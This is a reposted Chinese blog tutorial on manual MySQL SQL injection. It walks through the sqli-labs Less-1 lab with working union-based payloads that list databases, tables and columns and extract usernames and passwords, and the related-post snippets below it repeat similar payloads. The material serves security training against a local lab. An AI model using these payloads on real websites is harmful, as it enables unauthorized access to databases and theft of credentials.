mysql手工注入环境_MYSQL手工注入方法和流程

最新推荐文章于 2024-07-12 16:00:28 发布
最新推荐文章于 2024-07-12 16:00:28 发布
阅读量257 收藏 1
点赞数
文章标签: mysql手工注入环境
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30629043/article/details/113279386
版权

今天我们接着以sqli-labs实验环境的mysql数据库为例来讲解mysql数据库手工注入的方法和流程。mysql数据库是一个强大和使用广泛的数据库,它分为社区版和商业版,而且开放源码。这节课开始之前,先给大家介绍下mysql数据库的结构以及它强大的内置库。

MYSQL数据库的结构以及内置库

mysql数据库主要是由连接层、SQL层和存储引擎层组成的。其中连接层主要负责处理通讯协议、线程、身份数据验证等工作,SQL层主要是作为解析器和优化器、负责执行查询、权限管理、高速缓存查询、日志记录查询等工作,而存储引擎层主要是对接磁盘、内存和网络接口。

mysql 5.7及以上版本的内置库主要包括mysql、sys、performance_schema和information_schema这4个库,这4个内置库需要我们深入了解,特别是information_schema,这对我们进行mysql注入非常有帮助。

mysql:它保存了数据库的账户信息、权限信息,还有存储过程、时区、事件等内容;

sys:这个库包含了存储过程、用户的自定义函数以及视图,它可以帮助我们快速了解系统的元数据信息;

performance_schema:这个库用于收集数据库服务器的性能参数;

information_schema:它提供了访问数据库元数据的方式,它保存了关于mysql服务器所维护的所有其他数据库的信息,如库名、库表、表的数据类型以及访问权限等。这个库非常好用,通过它,我们可以窥知整个数据库的所有信息,它是我们进行mysql注入的重要工具。

MYSQL数据库手工注入的步骤及语法

我们进行SQL注入,通常都会有查看数据库版本信息、查看当前库、查找敏感表、查列和查数据这几个步骤。可以说,SQL注入都是基于查库、表、列这些语句的。但是SQL注入不会是我们安全测试的最终目的,在注入完成后,可能我们还要进行命令执行、提权等工作。SQL注入的通用步骤如下。

1、查询数据库的名称:

select schema_name from information_schema.schemata

2、查询某个库的表名,注意库名要使用单引号扩起来,也可以使用十六进制表示(特别是被过滤了单引号后):

select table_name from information_schema.tables where table_schema='库名'

3、查询某个表的列名:

select column_name from information_schema.columns where table_name='表名'  (在具备数据库权限的时候,等同于desc 表名)

4、查数据:

select 列名 from 库名.表名

如果在使用以上查询语句查询到结果数据太多,导致页面无法返回我们想要的查询结果,那么我们可以使用limit函数来限定查询结果返回的数量和位置,来依次拿到我们想要查看的数据。又或者可以使用concat/group_concat函数,把多条数据组合成一条数据。后面的实验将会介绍这几个函数的用法。

实验演示

下面我们开启sqli-labs的实验环境进行演示。

1、首先启动sqli-labs,重置数据库连接,打开第一关

2、根据提示,探测是否存在注入漏洞

http://127.0.0.1/Less-1/?id=1'   报错

3、构造简单的真假语句,确认系统存在SQL注入漏洞

http://127.0.0.1/Less-1/?id=1' and '1'='1 正常

http://127.0.0.1/Less-1/?id=1' and '1'='2 报错

也可以查看数据库版本、系统用户、当前库等

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select version())--+

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select user())--+

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select database())--+

4、使用order by来确定当前库当前表的列数

5、构造一个不存在的id值,寻找页面可以回显数据的地方

4、查库:

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select schema_name from information_schema.schemata)--+

提示:Subquery returns more than 1 row

使用group_concat来组合查询结果:

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+

5、查表:

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

或者使用database()函数查询当前库的表

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

6、查列:

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+

7、查数据:

http://127.0.0.1/Less-1/?id=-1' union select 1,2,(select group_concat(username,'--',password) from security.users)--+

对于实验里面使用的union、order by、limit、concat和group_concat的用法,建议大家可以上网找找教程自行学习,不用深入学习,理解和掌握用法就好。

本文来源于:MYSQL手工注入方法和流程-变化吧

特别声明:以上文章内容仅代表作者本人观点,不代表变化吧观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。

月夜棹孤舟
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL手工注入(内含实验)
weixin_57959384的博客
03-12 4014
网站的账号和密码在哪里? 数据库里。 数据库中储存着数据表,字段,数据,内容。结构化查询语句(SQL) 什么是SQL注入? SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 实验: 墨者学院,注册,登录。 找到靶场 (实验名称:MySQL手工注入漏洞测试(MySQL数据库)) 一、判断注
SQL手工注入MySQL数据库)详解---靶机(墨者学院)
CSDN_caiqian的博客
03-02 4399
SQL手工注入详解一、判断是否存在注入点二、Mysql数据库基本结构三、information_schema 简述 一、判断是否存在注入点 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞: 单引号 ’ ----> 页面错误 and 1=1 ----> 页面正常 and 1=2 ----> 页面错误 二、Mysql数据库基本结构 MYSQL数据库   数据库A=网站A=数据库用户A     表名           列名              
Mysql手工注入程,保姆级学过程
weixin_43167326的博客
01-30 3660
1.老方法:and 1=1 正常 and 1=2 页面错误 就可能存在注入点 2.判断字段 order by 1....n不显示那么它的前一个就是它的字段数量id=-1 union select 1,2,3,4... 3.信息收集:version()版本,database()数据库名字,user()数据用户,@@version_compile_os操作系统 4.在MySQL5.0以上版本中,mysql存在一个自带数据库名为information_shcema,它是一个存储记录所有数据库名,表名,列名的
MySQL手工注入
xiao_he0123的博客
03-16 3480
MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据 前言 此次文章建立在MySQL数据库的基础上 一、SQL注入的原理 可控变量带入数据库查询,变量未存在过滤或者过滤不完整 二,如何判断是否有注入点 and 1=1页面正常 and 1=2页面错误则表明有注入点 同时也可以对参数随意赋值判断如果
Mysql 手工注入
weixin_45625450的博客
09-14 779
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
PHP、mysql手工注入
10-12
【PHP与MySQL手工注入详解】 在互联网开发中,PHP与MySQL是常见的服务器端脚本语言和数据库管理系统,广泛应用于网站的构建。然而,随着技术的发展,网络安全问题也日益凸显,其中“手工注入”就是一种针对PHP与...
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
Mysql手工注入
09-16
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
sql server 2008 mysql 手工注入
03-25
在你提到的压缩包中,"数据库手工注入"可能包含了一些示例代码或实验环境,用于展示SQL注入的过程和防范措施。这可能是为了育或测试目的,通过实际操作帮助开发者理解如何检测和修复这些漏洞。在分析或测试这些...
MySql手工注入.doc#资源达人分享计划#
08-12
防止MySQL手工注入的关键在于强化输入验证、使用参数化查询、限制数据库用户的权限以及定期更新和修补Web应用程序。对服务器配置的保护也很重要,例如限制不必要的文件读写权限和设置严格的目录访问控制。
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2173
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
小白学习篇:MYSQL手工注入之多种类多姿势剖析(上)
weixin_64683116的博客
05-21 413
sql手工注入
write up:web 实战2-注入--sql注入手工注入详细版)
tb_youth的博客
12-03 607
0x00查找注入点 我是通过展开html标签来找注入点的 注入点 www.kabelindo.co.id/readnews.php?id=28 0x01 手动注入 先确定字段数目 先测试3,没有问题 再测试6,出错 再测试5,id=28时,不知道是不是我网的问题加载的很慢,我换成id=1进行测试,发现响应没有问题 这就确定了字段有5个 可以进一步验证: 查一下数据库名 查一下数据...
注入mysql数据库手工注入
2301_79194110的博客
09-15 303
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多。
我们的成长之路——MySQL数据库基本手工注入总结
weixin_63265626的博客
07-08 403
② 有些时候莫名其妙的就出错的时候(比如有数字显示位,而用替换函数(比如version())去替换时却返回空白页或报错),爆不出来的时候,可以尝试通过hex()或convert()等函数来解决可能的编码问题,比如hex(version())、unhex(hex(version()))、convert(version() using latin1)等等。如果你还不放心那就这样/*!④ and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名。
SWPU2019 Web1(无列名注入、MariaDB)
weixin_52780973的博客
10-31 968
sql注入、无列名注入、MariaDB
SQL注入MYSQL手工注入
最新发布
weixin_70940440的博客
07-12 1385
注意:参数传递方式:GET 请求的参数会放在 URL 中,通过 URL 可以直接看到;(4)品尝禁果,获取列下数据信息:查询username password字段(0x3a为“:”)4-information_schema.tables(解读:数据库服务+连接点+所有表信息)使id=-1直接使查询结果为空,这样,就不会占用第0行位置保证union 中1,2,3回显。注入:index.php?意思为: true (真:不会报错)1-数据库库名:security 2-php版本:5.7.26 3-字段数量。
手工SQL注入流程与常用语句
LCW991207的博客
01-26 1646
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。在这一步中,尝试去猜测出查询语句中的字段个数,如下注入语句所示,假设为字符型注入,先利用1’实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。查flag表记录的数量。
不同数据库的SQL注入不同手工注入方法的汇总
weixin_48421613的博客
06-10 1444
不同数据库注入方式 以下资源部分为自己的理解,部分为墨者上面的解题思路,此处做的是汇总,由于不知墨者大佬的出处,故无法做出转载地址,所以此文归类为转载,若是墨者大佬在这里看到了属于你的文章,觉得我发不太好请及时联系我,我好做删除处理 Mysql手工注入 大家可以去看一下博客,有很详细的讲解如何进行sql注入 https://blog.csdn.net/weixin_48421613/article/details/107488560 https://blog.csdn.net/weixin_4842161
PHP手工注入实战:揭示数据库秘密
PHP手工注入涉及到识别SQL注入点,利用注入技术探测数据库结构,获取敏感信息,以及可能的进一步操作如枚举表和列。对于开发人员来说,防止SQL注入的关键在于正确使用预处理语句、参数化查询,以及避免直接拼接用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值